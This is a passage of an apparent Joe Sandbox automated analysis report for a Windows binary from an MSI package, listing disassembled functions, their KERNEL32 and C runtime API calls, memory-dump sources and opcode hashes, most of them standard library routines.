                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00A621A3
                                                      • __alloca_probe_16.LIBCMT ref: 00A621CF
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00A6220E
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6222B
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A6226A
                                                      • __alloca_probe_16.LIBCMT ref: 00A62287
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A622C9
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A622EC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 2040435927-0
                                                      • Opcode ID: 0faeee61409eb7b03454628d19f56b43154ba2e8a4c7cd474573bebff2de9a45
                                                      • Instruction ID: 56fd623a18a4d50770e0e59036aa6790e8ba6afdd61c2f938266959ba11249a0
                                                      • Opcode Fuzzy Hash: 0faeee61409eb7b03454628d19f56b43154ba2e8a4c7cd474573bebff2de9a45
                                                      • Instruction Fuzzy Hash: DF51AF7290060AAFEF208FA4CC45FEF7BB9EF45B80F214528FA15AA150D734CD119B60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A48610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                      • LocalAlloc.KERNEL32(00000040,00000044,00000000,838A949E,?,00000000), ref: 00A486F9
                                                      • __Getctype.LIBCPMT ref: 00A4877B
                                                      • std::_Facet_Register.LIBCPMT ref: 00A487E4
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                      • String ID:
                                                      • API String ID: 2372200979-0
                                                      • Opcode ID: 80ae0014b370525a4bf41d6490b4b69e9a6fe80a2ac8c95ebc3501a16a11669b
                                                      • Instruction ID: 1af272fc29cb176bc5e9ac86c578c740c4768e035a12d4284871912c15834668
                                                      • Opcode Fuzzy Hash: 80ae0014b370525a4bf41d6490b4b69e9a6fe80a2ac8c95ebc3501a16a11669b
                                                      • Instruction Fuzzy Hash: 2D61E075D00644CFCB11CFA8D940BAEBBF0FF54314F248259E845AB392EB34AA85CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A49270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                      • LocalAlloc.KERNEL32(00000040,00000018,00000000,838A949E,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00A49342
                                                      • __Getctype.LIBCPMT ref: 00A493BD
                                                      • std::_Facet_Register.LIBCPMT ref: 00A493F8
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                      • String ID:
                                                      • API String ID: 2372200979-0
                                                      • Opcode ID: eba4fc671ee5a676947463bca4370ec81e1d740787a065c14ced6e9552b4b6e8
                                                      • Instruction ID: 9fc4638d657384176b745d05a74b9937056e28756a8967a5a67f2805695555d2
                                                      • Opcode Fuzzy Hash: eba4fc671ee5a676947463bca4370ec81e1d740787a065c14ced6e9552b4b6e8
                                                      • Instruction Fuzzy Hash: F951CA74A04209DFCB21CFA8C945BAFBBF4FB55710F20819DE845AB391DB70AA45CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A63F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00A63F57
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00A63F5F
                                                      • _ValidateLocalCookies.LIBCMT ref: 00A63FE8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A64013
                                                      • _ValidateLocalCookies.LIBCMT ref: 00A64068
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 3477420dfcfac9ce742629981e710844eb2fd5b301031fd536855b952c43d5fc
                                                      • Instruction ID: 582fd1872131841f3226f034633695e821fe4cb5f547aa7f971a44404e75312f
                                                      • Opcode Fuzzy Hash: 3477420dfcfac9ce742629981e710844eb2fd5b301031fd536855b952c43d5fc
                                                      • Instruction Fuzzy Hash: 1941A235E00219ABCF10DF68C885A9EBBB5FF44324F148459ED159B392D775EE06CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A772FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,00A77408,00A73841,0000000C,?,00000000,00000000,?,00A77632,00000021,FlsSetValue,00A8BD58,00A8BD60,?), ref: 00A773BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3664257935-537541572
                                                      • Opcode ID: b605bc7a164d1353fff8e729a994b87b545a7f516dccc8f856e1f3a5695c7ede
                                                      • Instruction ID: c1b5bfe6911f314128e71be5826492584eecd3d20eac8e518f2f991bf64abf7a
                                                      • Opcode Fuzzy Hash: b605bc7a164d1353fff8e729a994b87b545a7f516dccc8f856e1f3a5695c7ede
                                                      • Instruction Fuzzy Hash: 3121D536B09211EBD721DBA49C45E6E37689B81760F258610FD19AB291D730ED01D7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4B500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B531
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B54F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B577
                                                      • LocalAlloc.KERNEL32(00000040,0000000C,00000000,838A949E,?,00000000,00000000), ref: 00A4B5CF
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4B6B7
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B6E1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                      • String ID:
                                                      • API String ID: 3931714976-0
                                                      • Opcode ID: 93106f4b29b588db08a564a14b0d53d61db58d0ea9ad95020cc6e81d11f95caf
                                                      • Instruction ID: e6c4c09422c6297739e803847f5534e0169a44f2db1d71118c9c5322ba9a4a92
                                                      • Opcode Fuzzy Hash: 93106f4b29b588db08a564a14b0d53d61db58d0ea9ad95020cc6e81d11f95caf
                                                      • Instruction Fuzzy Hash: 8751C175900248DFDB11CFA8C980BAEFBB4FF50314F25415AE816AB391DBB5DA05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4B700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B731
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B74F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B777
                                                      • LocalAlloc.KERNEL32(00000040,00000008,00000000,838A949E,?,00000000,00000000), ref: 00A4B7CF
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4B863
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B88D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                      • String ID:
                                                      • API String ID: 3931714976-0
                                                      • Opcode ID: e342f4973f0675308eb552aadc1476167e57ad56830dd84aaea2e664adab9c10
                                                      • Instruction ID: cc27f074d583cc6d86720fbd562bfe6fe6c209982eff51b5fbb69b4bf205f834
                                                      • Opcode Fuzzy Hash: e342f4973f0675308eb552aadc1476167e57ad56830dd84aaea2e664adab9c10
                                                      • Instruction Fuzzy Hash: D3519B75A05214DFCB11CFA8C980B9EBBB4FF94714F24815EE855AB282DB74EA05CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A70351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3509577899-3206640213
                                                      • Opcode ID: b246131b6aad5b32382614b46e1ab00b32891265ccfeff52ed79e4a861bd6fb4
                                                      • Instruction ID: 3caee4758fb37c16ad9a4283011d352b8ec059f62525de3a33657e1fd1b55bc2
                                                      • Opcode Fuzzy Hash: b246131b6aad5b32382614b46e1ab00b32891265ccfeff52ed79e4a861bd6fb4
                                                      • Instruction Fuzzy Hash: 22C1D975900606DBCB28CF68CD99EBAB7B0FF45700F28C049EA0DAB650D275AD41CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A65978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00A6596F,00A64900,00A6358F), ref: 00A65986
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A65994
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A659AD
                                                      • SetLastError.KERNEL32(00000000,00A6596F,00A64900,00A6358F), ref: 00A659FF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 9c9119093a24ac1e20abd315f0fcba9d28bb80932eb39d9a62c03969a6a0968d
                                                      • Instruction ID: 41a8d8aa32f644fe69f05caf27fb675570ab98696fe768dde0a6caff2eff6534
                                                      • Opcode Fuzzy Hash: 9c9119093a24ac1e20abd315f0fcba9d28bb80932eb39d9a62c03969a6a0968d
                                                      • Instruction Fuzzy Hash: E9018437709F12EFE62567F66D86A6A2B74DB02779F20032AF514951F1EE114C129290
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A43230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,838A949E,?,00000004), ref: 00A43294
                                                      • MoveFileW.KERNEL32(?,00000000), ref: 00A4354A
                                                      • DeleteFileW.KERNEL32(?), ref: 00A43592
                                                        • Part of subcall function 00A41A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00A41AF7
                                                        • Part of subcall function 00A41A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00A41B7D
                                                        • Part of subcall function 00A42E60: LocalFree.KERNEL32(?,838A949E,?,?,00A83C40,000000FF,?,00A41242,838A949E,?,?,00A83C75,000000FF), ref: 00A42EB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                      • String ID: URL$url
                                                      • API String ID: 853893950-346267919
                                                      • Opcode ID: 6d5688ac375d0f788492bb3b4137b4f037abd3af30f09c838c0d7aee574cceb3
                                                      • Instruction ID: 364caf31f147e5d367300241446ac5f308442ce55afffbde76237cbdde242a6b
                                                      • Opcode Fuzzy Hash: 6d5688ac375d0f788492bb3b4137b4f037abd3af30f09c838c0d7aee574cceb3
                                                      • Instruction Fuzzy Hash: B2C16774D142689ADF24DF28CD987DDBBB4BF94304F5042D9E009A7291EBB46B88CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A436D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00A43735
                                                      • GetLastError.KERNEL32(?,?,?,00A84215,000000FF), ref: 00A4381A
                                                        • Part of subcall function 00A42310: GetProcessHeap.KERNEL32 ref: 00A42365
                                                        • Part of subcall function 00A446F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00A43778,-00000010,?,?,?,00A84215,000000FF), ref: 00A44736
                                                      • _wcschr.LIBVCRUNTIME ref: 00A437C6
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00A84215,000000FF), ref: 00A437DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                      • String ID: ntdll.dll
                                                      • API String ID: 3941625479-2227199552
                                                      • Opcode ID: 29f46e76dc534d7bdc9f43a1263e9d0c20427f292dc66f4a6b05d057ccec0180
                                                      • Instruction ID: e6757594512f5d3f65e63340730b6628f134e5eab856503410bc8d4125d3224c
                                                      • Opcode Fuzzy Hash: 29f46e76dc534d7bdc9f43a1263e9d0c20427f292dc66f4a6b05d057ccec0180
                                                      • Instruction Fuzzy Hash: 50417175A00605AFDF10DFA8DD45BAEB7F4FF54310F144629E92697281EBB0AA04CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A41A20: LocalFree.KERNEL32(?), ref: 00A41A42
                                                        • Part of subcall function 00A63E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A41434,?,?,00A4D341,00A41434,00A98B5C,?,00A41434,?,00000000), ref: 00A63EBA
                                                      • GetCurrentProcess.KERNEL32(838A949E,838A949E,?,?,00000000,00A84981,000000FF), ref: 00A462EB
                                                        • Part of subcall function 00A62C98: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CA3
                                                        • Part of subcall function 00A62C98: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CE0
                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00A462B0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A462B7
                                                        • Part of subcall function 00A62C4E: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                        • Part of subcall function 00A62C4E: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                        • Part of subcall function 00A62C4E: RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                      • String ID: IsWow64Process$kernel32
                                                      • API String ID: 1333104975-3789238822
                                                      • Opcode ID: 8dd8cbf1cc2d10d222a06e8352ef78d575671e5690eec9bef18ab35b05516328
                                                      • Instruction ID: 920e5deaaaeccd5077477f0495174b23e0e0d821abb4e750f2942d0e602b5b3e
                                                      • Opcode Fuzzy Hash: 8dd8cbf1cc2d10d222a06e8352ef78d575671e5690eec9bef18ab35b05516328
                                                      • Instruction Fuzzy Hash: F7210272E48605EFCB10DFE4DE06B9DB7B8FB18B10F100626F911932D0EB7569018B62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A58451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                      • String ID: $+xv
                                                      • API String ID: 2204710431-1686923651
                                                      • Opcode ID: 91ff4b8dac4bfdbe682a36dfd646e3dda8c44515bb041326b0704095ead49d21
                                                      • Instruction ID: f79a2aeda54fcd0fe0ea0af34b0322004bc25bf2d165dd1418341e7a0079d6ae
                                                      • Opcode Fuzzy Hash: 91ff4b8dac4bfdbe682a36dfd646e3dda8c44515bb041326b0704095ead49d21
                                                      • Instruction Fuzzy Hash: 332186B1904B926EDB65DF74C49077BBEF8BB08311F04455AE859C7A42D734EA05CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A46250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(838A949E,838A949E,?,?,00000000,00A84981,000000FF), ref: 00A462EB
                                                        • Part of subcall function 00A62C98: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CA3
                                                        • Part of subcall function 00A62C98: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CE0
                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00A462B0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A462B7
                                                        • Part of subcall function 00A62C4E: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                        • Part of subcall function 00A62C4E: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                        • Part of subcall function 00A62C4E: RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                      • String ID: IsWow64Process$kernel32
                                                      • API String ID: 2056477612-3789238822
                                                      • Opcode ID: cef59f3279d52b5b6b23ba6a8725b96718963e79f243b81ddae809921edabc30
                                                      • Instruction ID: 4ad51937ca819d445798e9d6f2f0d3c4423f6f3aac5d5756d44d9904656075a3
                                                      • Opcode Fuzzy Hash: cef59f3279d52b5b6b23ba6a8725b96718963e79f243b81ddae809921edabc30
                                                      • Instruction Fuzzy Hash: 9E11BEB2E48754EFCB10CFA4DD06B9AB7B8F719B20F14066AE911936D0EB75A900CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A669E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A66AA3,?,?,00A9DDCC,00000000,?,00A66BCE,00000004,InitializeCriticalSectionEx,00A897E8,InitializeCriticalSectionEx,00000000), ref: 00A66A72
